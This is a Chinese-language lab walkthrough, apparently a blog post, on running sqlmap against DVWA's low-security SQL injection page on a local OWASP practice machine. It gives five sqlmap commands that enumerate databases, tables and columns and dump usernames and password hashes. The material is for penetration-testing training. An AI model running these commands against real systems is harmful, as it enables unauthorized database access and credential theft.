使用Sqlmap对dvwa进行sql注入测试(初级阶段)

0.测试准备

1)打开Kali虚拟机终端;
使用Sqlmap对dvwa进行sql注入测试(初级阶段)
2)打开靶机OWASP,并通过浏览器,输入IP地址进入dvwa的主页,然后选择SQL injection进入SQL注入的测试页面
使用Sqlmap对dvwa进行sql注入测试(初级阶段)使用Sqlmap对dvwa进行sql注入测试(初级阶段)使用Sqlmap对dvwa进行sql注入测试(初级阶段)

1.获取DVWA的url和cookie

在输入框中输入1,显示有内容,此时利用此URL进行SQL注入。
输入document.cookie获取页面的cookie。去除remem_token字段的内容,用于下文的sql注入终端的cookie。
使用Sqlmap对dvwa进行sql注入测试(初级阶段)

3.在终端开始测试

1)终端中输入指令一:
sqlmap -u"http://192.168.134.129/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie “security=low; PHPSESSID=lcph9vq217i7bkio8piu6h5td2” --dbs
使用Sqlmap对dvwa进行sql注入测试(初级阶段)结果如下,说明找到了连个数据库dvwa和information_schema,接下来获取数据库dvwa 中的表格。
使用Sqlmap对dvwa进行sql注入测试(初级阶段)2)在终端中输入指令二:
sqlmap -u"http://192.168.134.129/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie “security=low; PHPSESSID=lcph9vq217i7bkio8piu6h5td2” -D dvwa --tables
使用Sqlmap对dvwa进行sql注入测试(初级阶段)结果如下,发现有两个表格,guestbook和users,接下来获取users数据表中有哪些列。
使用Sqlmap对dvwa进行sql注入测试(初级阶段)3)在终端中输入指令三:
sqlmap -u"http://192.168.134.129/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie “security=low; PHPSESSID=lcph9vq217i7bkio8piu6h5td2” -D dvwa -T users --columns
使用Sqlmap对dvwa进行sql注入测试(初级阶段)结果如下,说明users一共有六列,接下来获取具体内容
使用Sqlmap对dvwa进行sql注入测试(初级阶段)
4)在终端中输入指令四,有提示信息则输入y:
sqlmap -u"http://192.168.134.129/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie “security=low; PHPSESSID=lcph9vq217i7bkio8piu6h5td2” -D dvwa -T users --dump
使用Sqlmap对dvwa进行sql注入测试(初级阶段)结果如下,表格中的数据即显示。
使用Sqlmap对dvwa进行sql注入测试(初级阶段)5)若数据库中数据较多,可在终端中输入指令五,只输出用户名和密码字段:
sqlmap -u"http://192.168.134.129/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie “security=low; PHPSESSID=lcph9vq217i7bkio8piu6h5td2” -D dvwa -T users -C “user,password” --dump

使用Sqlmap对dvwa进行sql注入测试(初级阶段)
结束!